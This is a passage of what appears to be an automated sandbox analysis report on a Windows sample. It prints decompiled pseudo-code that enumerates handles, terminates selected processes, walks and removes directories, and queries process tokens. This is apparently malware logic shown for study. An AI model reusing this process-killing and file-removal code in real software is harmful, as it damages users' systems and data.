					if(_t43 < 0x3d) {
						_v8 = _t45 + 1;
					} else {
						_v8 = _t45 + 2;
					}
				} else {
					_v8 =  *(_t49 + 0x52) & 0x000000ff;
				}
				goto L15;
			}















                                                                                        0x0040556f
                                                                                        0x00405576
                                                                                        0x0040558e
                                                                                        0x00405591
                                                                                        0x0040559f
                                                                                        0x004055a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004055b2
                                                                                        0x004055ec
                                                                                        0x004055b4
                                                                                        0x004055b4
                                                                                        0x004055cc
                                                                                        0x00000000
                                                                                        0x004055cc
                                                                                        0x00000000
                                                                                        0x004055b2
                                                                                        0x004055ef
                                                                                        0x004055f2
                                                                                        0x004055f8
                                                                                        0x004055ff
                                                                                        0x00405606
                                                                                        0x00405609
                                                                                        0x0040560a
                                                                                        0x0040560d
                                                                                        0x0040560f
                                                                                        0x00405613
                                                                                        0x00405619
                                                                                        0x0040561e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405652
                                                                                        0x00405656
                                                                                        0x00405657
                                                                                        0x0040565e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405660
                                                                                        0x0040566b
                                                                                        0x0040567c
                                                                                        0x00000000
                                                                                        0x0040567c
                                                                                        0x00405620
                                                                                        0x00405628
                                                                                        0x00405636
                                                                                        0x00405643
                                                                                        0x00405638
                                                                                        0x0040563b
                                                                                        0x0040563b
                                                                                        0x0040562a
                                                                                        0x0040562e
                                                                                        0x0040562e
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 00405588
                                                                                        • NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000028), ref: 004055C6
                                                                                        • _wcsicmp.NTDLL ref: 00405613
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Allocate$FreeObjectQuery_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 2293617046-0
                                                                                        • Opcode ID: 2030e8a2f2f4273e8b4111c207a00a0d2bd4d3997f06d320612747033885a0fa
                                                                                        • Instruction ID: 05a33972e397d168fdc4487f25c2144293a10a829dda077af1d2e93b1e0dd51b
                                                                                        • Opcode Fuzzy Hash: 2030e8a2f2f4273e8b4111c207a00a0d2bd4d3997f06d320612747033885a0fa
                                                                                        • Instruction Fuzzy Hash: 0A31BA72900608FFDB208F90ED45BAEBB71FB04314F10887AE515B26A0E7365A1A9F48
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405756, Relevance: 9.1, APIs: 6, Instructions: 85memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E00405756(void* __ebx) {
				long _t60;
				void* _t64;
				long _t65;
				intOrPtr* _t71;
				WCHAR* _t85;
				void* _t86;
				void* _t101;
				intOrPtr _t105;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t118;
				void* _t121;

				_t101 = __ebx;
				while(1) {
					_t60 = NtQuerySystemInformation(0x10,  *(_t115 - 0x24),  *(_t115 - 0x28), _t115 - 0x28);
					if(_t60 == 0) {
						break;
					}
					if(_t60 != 0xc0000004) {
						RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
						return  *((intOrPtr*)(_t115 - 4));
					} else {
						 *(_t115 - 0x24) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t115 - 0x24),  *(_t115 - 0x28));
						continue;
					}
					L35:
				}
				_t64 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
				 *(_t115 - 0x1c) = _t64;
				_t113 =  *(_t115 - 0x24);
				asm("lodsd");
				_t110 = _t64;
				 *(_t115 - 8) = 0;
				do {
					_t105 =  *((intOrPtr*)(_t115 - 0xc));
					_t65 =  *(_t115 - 8);
					if( *((intOrPtr*)(_t113 + 4)) != _t101 ||  *_t113 <= 4 ||  *_t113 == _t65 ||  *_t113 == _t105) {
						goto L27;
					} else {
						 *(_t115 - 0x10) = 0;
						 *(_t115 - 0x30) =  *_t113;
						 *(_t115 - 0x2c) = 0;
						_t71 = _t115 - 0x48;
						 *_t71 = 0x18;
						 *(_t71 + 4) = 0;
						 *(_t71 + 8) = 0;
						 *(_t71 + 0xc) = 0;
						 *(_t71 + 0x10) = 0;
						 *(_t71 + 0x14) = 0;
						if(NtOpenProcess(_t115 - 0x10, 0x100441, _t115 - 0x48, _t115 - 0x30) == 0) {
							if(NtDuplicateObject( *(_t115 - 0x10),  *(_t113 + 6) & 0x0000ffff, 0xffffffff, _t115 - 0x14, 0, 0, 2) == 0) {
								if(E004054E0( *(_t115 - 0x14),  *(_t115 - 0x1c)) != 0) {
									memset( *(_t115 - 0x1c), 0, 0x10000);
									_t118 = _t118 + 0xc;
									goto L25;
								} else {
									_t85 = PathFindFileNameW( *(_t115 - 0x1c) + 4);
									_t86 =  *0x40f694(_t85,  *((intOrPtr*)(_t115 - 0x18)));
									_t121 = _t118 + 8;
									if(_t86 != 0) {
										memset( *(_t115 - 0x1c), 0, 0x10000);
										_t118 = _t121 + 0xc;
										L25:
										NtClose( *(_t115 - 0x14));
										goto L26;
									} else {
										 *(_t115 - 0x20) = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
										if(NtQueryInformationProcess( *(_t115 - 0x10), 0x1b,  *(_t115 - 0x20), 0x10000, _t115 - 0x28) == 0) {
											if(E0040567D(PathFindFileNameW( *( *(_t115 - 0x20) + 4))) == 0) {
												 *0x40f708( *(_t115 - 0x10), 0);
												WaitForSingleObject( *(_t115 - 0x10), 0xffffffff);
												 *((intOrPtr*)(_t115 - 4)) = 1;
											}
											NtClose( *(_t115 - 0x14));
											NtClose( *(_t115 - 0x10));
										}
									}
								}
							} else {
								 *(_t115 - 8) =  *_t113;
								L26:
								NtClose( *(_t115 - 0x10));
								goto L27;
							}
						} else {
							 *(_t115 - 8) =  *_t113;
							goto L27;
						}
					}
					break;
					L27:
					_t113 = _t113 + 0x10;
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				if( *(_t115 - 0x24) != 0) {
					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
				}
				if( *(_t115 - 0x1c) != 0) {
					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x1c));
				}
				if( *(_t115 - 0x20) != 0) {
					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x20));
				}
				return  *((intOrPtr*)(_t115 - 4));
				goto L35;
			}
















                                                                                        0x00405756
                                                                                        0x0040573e
                                                                                        0x0040574a
                                                                                        0x00405752
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x00405785
                                                                                        0x00405796
                                                                                        0x0040575f
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x004057a8
                                                                                        0x004057ae
                                                                                        0x004057b1
                                                                                        0x004057b4
                                                                                        0x004057b5
                                                                                        0x004057b7
                                                                                        0x004057be
                                                                                        0x004057be
                                                                                        0x004057c1
                                                                                        0x004057c7
                                                                                        0x00000000
                                                                                        0x004057e6
                                                                                        0x004057e6
                                                                                        0x004057ef
                                                                                        0x004057f2
                                                                                        0x004057f9
                                                                                        0x004057fc
                                                                                        0x00405802
                                                                                        0x00405809
                                                                                        0x00405810
                                                                                        0x00405817
                                                                                        0x0040581e
                                                                                        0x0040583e
                                                                                        0x00405866
                                                                                        0x0040587f
                                                                                        0x0040593d
                                                                                        0x00405943
                                                                                        0x00000000
                                                                                        0x00405885
                                                                                        0x0040588c
                                                                                        0x00405896
                                                                                        0x0040589c
                                                                                        0x004058a1
                                                                                        0x00405928
                                                                                        0x0040592e
                                                                                        0x00405946
                                                                                        0x00405949
                                                                                        0x00000000
                                                                                        0x004058a3
                                                                                        0x004058b6
                                                                                        0x004058d2
                                                                                        0x004058eb
                                                                                        0x004058f2
                                                                                        0x004058fd
                                                                                        0x00405903
                                                                                        0x00405903
                                                                                        0x0040590d
                                                                                        0x00405916
                                                                                        0x00405916
                                                                                        0x0040591c
                                                                                        0x004058a1
                                                                                        0x00405868
                                                                                        0x0040586a
                                                                                        0x0040594f
                                                                                        0x00405952
                                                                                        0x00000000
                                                                                        0x00405952
                                                                                        0x00405840
                                                                                        0x00405842
                                                                                        0x00000000
                                                                                        0x00405842
                                                                                        0x0040583e
                                                                                        0x00000000
                                                                                        0x00405958
                                                                                        0x00405958
                                                                                        0x0040595b
                                                                                        0x0040595c
                                                                                        0x00405968
                                                                                        0x00405975
                                                                                        0x00405975
                                                                                        0x0040597f
                                                                                        0x0040598c
                                                                                        0x0040598c
                                                                                        0x00405996
                                                                                        0x004059a3
                                                                                        0x004059a3
                                                                                        0x004059b4
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000000,00000400,00000400), ref: 0040574A
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000400), ref: 0040576D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00010000), ref: 004057A8
                                                                                        • NtOpenProcess.NTDLL(00000000,00100441,?,?), ref: 00405836
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00405975
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040598C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004059A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate$InformationOpenProcessQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 1274054332-0
                                                                                        • Opcode ID: 323bf974465820a9ca4684000b3f9fe8afd21da4940bf57cebcfedbd9dae2718
                                                                                        • Instruction ID: aef76e67c4994cf3bea6b660a8da59467be58e7d1027b6c966269403f1c264c7
                                                                                        • Opcode Fuzzy Hash: 323bf974465820a9ca4684000b3f9fe8afd21da4940bf57cebcfedbd9dae2718
                                                                                        • Instruction Fuzzy Hash: 19313871900609EFDB21CF90DD08BAEBBB4FB08310F24447AE540B72A0D77A9949DF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405778, Relevance: 9.1, APIs: 6, Instructions: 85memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E00405778(void* __ebx) {
				long _t60;
				void* _t64;
				long _t65;
				intOrPtr* _t71;
				WCHAR* _t85;
				void* _t86;
				void* _t101;
				intOrPtr _t105;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t118;
				void* _t121;

				_t101 = __ebx;
				while(1) {
					_t60 = NtQuerySystemInformation(0x10,  *(_t115 - 0x24),  *(_t115 - 0x28), _t115 - 0x28);
					if(_t60 == 0) {
						break;
					}
					if(_t60 != 0xc0000004) {
						RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
						return  *((intOrPtr*)(_t115 - 4));
					} else {
						 *(_t115 - 0x24) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t115 - 0x24),  *(_t115 - 0x28));
						continue;
					}
					L35:
				}
				_t64 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
				 *(_t115 - 0x1c) = _t64;
				_t113 =  *(_t115 - 0x24);
				asm("lodsd");
				_t110 = _t64;
				 *(_t115 - 8) = 0;
				do {
					_t105 =  *((intOrPtr*)(_t115 - 0xc));
					_t65 =  *(_t115 - 8);
					if( *((intOrPtr*)(_t113 + 4)) != _t101 ||  *_t113 <= 4 ||  *_t113 == _t65 ||  *_t113 == _t105) {
						goto L27;
					} else {
						 *(_t115 - 0x10) = 0;
						 *(_t115 - 0x30) =  *_t113;
						 *(_t115 - 0x2c) = 0;
						_t71 = _t115 - 0x48;
						 *_t71 = 0x18;
						 *(_t71 + 4) = 0;
						 *(_t71 + 8) = 0;
						 *(_t71 + 0xc) = 0;
						 *(_t71 + 0x10) = 0;
						 *(_t71 + 0x14) = 0;
						if(NtOpenProcess(_t115 - 0x10, 0x100441, _t115 - 0x48, _t115 - 0x30) == 0) {
							if(NtDuplicateObject( *(_t115 - 0x10),  *(_t113 + 6) & 0x0000ffff, 0xffffffff, _t115 - 0x14, 0, 0, 2) == 0) {
								if(E004054E0( *(_t115 - 0x14),  *(_t115 - 0x1c)) != 0) {
									memset( *(_t115 - 0x1c), 0, 0x10000);
									_t118 = _t118 + 0xc;
									goto L25;
								} else {
									_t85 = PathFindFileNameW( *(_t115 - 0x1c) + 4);
									_t86 =  *0x40f694(_t85,  *((intOrPtr*)(_t115 - 0x18)));
									_t121 = _t118 + 8;
									if(_t86 != 0) {
										memset( *(_t115 - 0x1c), 0, 0x10000);
										_t118 = _t121 + 0xc;
										L25:
										NtClose( *(_t115 - 0x14));
										goto L26;
									} else {
										 *(_t115 - 0x20) = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
										if(NtQueryInformationProcess( *(_t115 - 0x10), 0x1b,  *(_t115 - 0x20), 0x10000, _t115 - 0x28) == 0) {
											if(E0040567D(PathFindFileNameW( *( *(_t115 - 0x20) + 4))) == 0) {
												 *0x40f708( *(_t115 - 0x10), 0);
												WaitForSingleObject( *(_t115 - 0x10), 0xffffffff);
												 *((intOrPtr*)(_t115 - 4)) = 1;
											}
											NtClose( *(_t115 - 0x14));
											NtClose( *(_t115 - 0x10));
										}
									}
								}
							} else {
								 *(_t115 - 8) =  *_t113;
								L26:
								NtClose( *(_t115 - 0x10));
								goto L27;
							}
						} else {
							 *(_t115 - 8) =  *_t113;
							goto L27;
						}
					}
					break;
					L27:
					_t113 = _t113 + 0x10;
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				if( *(_t115 - 0x24) != 0) {
					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
				}
				if( *(_t115 - 0x1c) != 0) {
					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x1c));
				}
				if( *(_t115 - 0x20) != 0) {
					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x20));
				}
				return  *((intOrPtr*)(_t115 - 4));
				goto L35;
			}
















                                                                                        0x00405778
                                                                                        0x0040573e
                                                                                        0x0040574a
                                                                                        0x00405752
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x00405785
                                                                                        0x00405796
                                                                                        0x0040575f
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x00405773
                                                                                        0x00000000
                                                                                        0x0040575d
                                                                                        0x004057a8
                                                                                        0x004057ae
                                                                                        0x004057b1
                                                                                        0x004057b4
                                                                                        0x004057b5
                                                                                        0x004057b7
                                                                                        0x004057be
                                                                                        0x004057be
                                                                                        0x004057c1
                                                                                        0x004057c7
                                                                                        0x00000000
                                                                                        0x004057e6
                                                                                        0x004057e6
                                                                                        0x004057ef
                                                                                        0x004057f2
                                                                                        0x004057f9
                                                                                        0x004057fc
                                                                                        0x00405802
                                                                                        0x00405809
                                                                                        0x00405810
                                                                                        0x00405817
                                                                                        0x0040581e
                                                                                        0x0040583e
                                                                                        0x00405866
                                                                                        0x0040587f
                                                                                        0x0040593d
                                                                                        0x00405943
                                                                                        0x00000000
                                                                                        0x00405885
                                                                                        0x0040588c
                                                                                        0x00405896
                                                                                        0x0040589c
                                                                                        0x004058a1
                                                                                        0x00405928
                                                                                        0x0040592e
                                                                                        0x00405946
                                                                                        0x00405949
                                                                                        0x00000000
                                                                                        0x004058a3
                                                                                        0x004058b6
                                                                                        0x004058d2
                                                                                        0x004058eb
                                                                                        0x004058f2
                                                                                        0x004058fd
                                                                                        0x00405903
                                                                                        0x00405903
                                                                                        0x0040590d
                                                                                        0x00405916
                                                                                        0x00405916
                                                                                        0x0040591c
                                                                                        0x004058a1
                                                                                        0x00405868
                                                                                        0x0040586a
                                                                                        0x0040594f
                                                                                        0x00405952
                                                                                        0x00000000
                                                                                        0x00405952
                                                                                        0x00405840
                                                                                        0x00405842
                                                                                        0x00000000
                                                                                        0x00405842
                                                                                        0x0040583e
                                                                                        0x00000000
                                                                                        0x00405958
                                                                                        0x00405958
                                                                                        0x0040595b
                                                                                        0x0040595c
                                                                                        0x00405968
                                                                                        0x00405975
                                                                                        0x00405975
                                                                                        0x0040597f
                                                                                        0x0040598c
                                                                                        0x0040598c
                                                                                        0x00405996
                                                                                        0x004059a3
                                                                                        0x004059a3
                                                                                        0x004059b4
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000000,00000400,00000400), ref: 0040574A
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000400), ref: 0040576D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00010000), ref: 004057A8
                                                                                        • NtOpenProcess.NTDLL(00000000,00100441,?,?), ref: 00405836
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00405975
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040598C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004059A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate$InformationOpenProcessQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 1274054332-0
                                                                                        • Opcode ID: 1967e6ece01a1961eee519764137e8cdfb7db098ec689b9e308a36bbac97e9d0
                                                                                        • Instruction ID: aef76e67c4994cf3bea6b660a8da59467be58e7d1027b6c966269403f1c264c7
                                                                                        • Opcode Fuzzy Hash: 1967e6ece01a1961eee519764137e8cdfb7db098ec689b9e308a36bbac97e9d0
                                                                                        • Instruction Fuzzy Hash: 19313871900609EFDB21CF90DD08BAEBBB4FB08310F24447AE540B72A0D77A9949DF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403EDD, Relevance: 9.1, APIs: 6, Instructions: 70fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00403EDD(wchar_t* _a4) {
				void* _v8;
				char _v12;
				long _v532;
				struct _WIN32_FIND_DATAW _v1124;
				void* _t22;
				wchar_t* _t25;
				void* _t41;
				void* _t42;

				_t22 = E00403FBA(_a4,  &_v532);
				if(_t22 != 0) {
					E00401A3A( &_v532);
					_t25 =  &_v12;
					 *_t25 = 0x2d0053;
					_t25[1] = 0x2a;
					wcscat( &_v532, _t25);
					_t42 = _t41 + 8;
					_t22 = FindFirstFileExW( &_v532, 0,  &_v1124, 0, 0, 0);
					_v8 = _t22;
					if(_v8 != 0xffffffff) {
						do {
							if((_v1124.dwFileAttributes & 0x00000010) != 0) {
								wcscpy( &((wcsrchr( &_v532, 0x5c))[0]),  &(_v1124.cFileName));
								_t42 = _t42 + 0x10;
								E0040409F( &_v532);
							}
						} while (FindNextFileW(_v8,  &_v1124) != 0);
						return FindClose(_v8);
					}
				}
				return _t22;
			}











                                                                                        0x00403ef5
                                                                                        0x00403efc
                                                                                        0x00403f09
                                                                                        0x00403f0e
                                                                                        0x00403f11
                                                                                        0x00403f17
                                                                                        0x00403f26
                                                                                        0x00403f2c
                                                                                        0x00403f45
                                                                                        0x00403f4b
                                                                                        0x00403f52
                                                                                        0x00403f54
                                                                                        0x00403f5e
                                                                                        0x00403f7d
                                                                                        0x00403f83
                                                                                        0x00403f8d
                                                                                        0x00403f8d
                                                                                        0x00403fa2
                                                                                        0x00000000
                                                                                        0x00403fa9
                                                                                        0x00403f52
                                                                                        0x00403fb7

                                                                                        APIs
                                                                                          • Part of subcall function 00403FBA: wcscpy.NTDLL ref: 00403FD9
                                                                                          • Part of subcall function 00403FBA: wcscat.NTDLL ref: 0040400F
                                                                                          • Part of subcall function 00403FBA: FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0040402E
                                                                                          • Part of subcall function 00403FBA: wcscpy.NTDLL ref: 0040404F
                                                                                          • Part of subcall function 00403FBA: wcscat.NTDLL ref: 00404062
                                                                                          • Part of subcall function 00403FBA: FindClose.KERNEL32(000000FF), ref: 0040408B
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00403F26
                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00403F45
                                                                                        • wcsrchr.NTDLL ref: 00403F69
                                                                                        • wcscpy.NTDLL ref: 00403F7D
                                                                                          • Part of subcall function 0040409F: wcslen.NTDLL ref: 004040BE
                                                                                          • Part of subcall function 0040409F: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 004040DF
                                                                                          • Part of subcall function 0040409F: wcscpy.NTDLL ref: 004040F8
                                                                                          • Part of subcall function 0040409F: wcscat.NTDLL ref: 00404117
                                                                                          • Part of subcall function 0040409F: FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00404132
                                                                                          • Part of subcall function 0040409F: wcslen.NTDLL ref: 00404161
                                                                                          • Part of subcall function 0040409F: wcslen.NTDLL ref: 0040416F
                                                                                          • Part of subcall function 0040409F: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040418A
                                                                                          • Part of subcall function 0040409F: wcscpy.NTDLL ref: 004041A3
                                                                                          • Part of subcall function 0040409F: wcsrchr.NTDLL ref: 004041B1
                                                                                          • Part of subcall function 0040409F: wcscpy.NTDLL ref: 004041C2
                                                                                          • Part of subcall function 0040409F: GetFileAttributesW.KERNEL32(00000000), ref: 004041CE
                                                                                          • Part of subcall function 0040409F: RemoveDirectoryW.KERNEL32(00000000,00000000), ref: 004041F2
                                                                                          • Part of subcall function 0040409F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404203
                                                                                        • FindNextFileW.KERNEL32(000000FF,?,?,00000000), ref: 00403F9C
                                                                                        • FindClose.KERNEL32(000000FF,?,00000000), ref: 00403FA9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Findwcscpy$File$wcscatwcslen$FirstHeap$AllocateClosewcsrchr$AttributesDirectoryFreeNextRemove
                                                                                        • String ID:
                                                                                        • API String ID: 605736639-0
                                                                                        • Opcode ID: 5c71c00abe015d81086f7918051314c0ae688f358dcbfe31925b72272ac79de5
                                                                                        • Instruction ID: d99c8b8c5bf66cacb51d49b1237038c82d90471e11b7a8205135aa6531c62d14
                                                                                        • Opcode Fuzzy Hash: 5c71c00abe015d81086f7918051314c0ae688f358dcbfe31925b72272ac79de5
                                                                                        • Instruction Fuzzy Hash: FA213DB190021CAFDB20DF90DD49FEAB7BCEB04305F4444BAB608E2190E7759B598B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004020A3, Relevance: 9.1, APIs: 6, Instructions: 69nativememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,?), ref: 004020BD
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,?,00000004,?), ref: 004020DA
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 004020EB
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,00000000,?,?), ref: 00402109
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402145
                                                                                        • NtClose.NTDLL(?), ref: 0040214E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Token$HeapInformationQuery$AllocateCloseFreeOpenProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2834467292-0
                                                                                        • Opcode ID: 64bf4633e7434abd1c7c6cd6f404db9bb5d718fa07b42b3c983a399241729110
                                                                                        • Instruction ID: 198f46a11d177ab6c43c5cd4ef28576361b4b60eaf87f4fdacca15c80edfd62e
                                                                                        • Opcode Fuzzy Hash: 64bf4633e7434abd1c7c6cd6f404db9bb5d718fa07b42b3c983a399241729110
                                                                                        • Instruction Fuzzy Hash: D2213872900209BFEB209F90DD49BAEBBB9FB14321F404576E620B61E0D7B25A498B54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403303, Relevance: 9.1, APIs: 6, Instructions: 66nativememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00403332
                                                                                        • NtQueryInformationToken.NTDLL(00000000,00000001,?,00000028,0040D051), ref: 0040334E
                                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00403363
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403396
                                                                                        • NtClose.NTDLL(00000000), ref: 004033A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Token$CloseConvertFreeHeapInformationOpenProcessQueryString
                                                                                        • String ID:
                                                                                        • API String ID: 2116111113-0
                                                                                        • Opcode ID: de29dab458cdd23e3370c7ec52759eea74b706aedef0ea8dced3d09f10d4c8b4
                                                                                        • Instruction ID: fb7abfd45a6aa92f458a8256b14b969b6b9d919c01c3cc4abf3ca5e85aa21afc
                                                                                        • Opcode Fuzzy Hash: de29dab458cdd23e3370c7ec52759eea74b706aedef0ea8dced3d09f10d4c8b4
                                                                                        • Instruction Fuzzy Hash: 54212971500209AFEB20DF90DD88BAEBB7CFB00316F10413AE910B11E0DB765A499B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408F5B, Relevance: 9.1, APIs: 6, Instructions: 62filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E00408F5B(void* __eflags, intOrPtr _a4, WCHAR* _a8) {
				char _v28;
				short _v92;
				void* _t17;
				intOrPtr* _t18;
				void* _t24;
				void* _t28;
				void _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;

				E00402160();
				E004022D9(3);
				if( *0x40f5a1 != 0) {
					E0040314C(0x40f610);
				}
				_t17 = E004069E1(_a8);
				if( *0x40f5a5 != 0) {
					_t18 =  &_v28;
					 *_t18 = 0x6f004c;
					 *((intOrPtr*)(_t18 + 4)) = 0x610063;
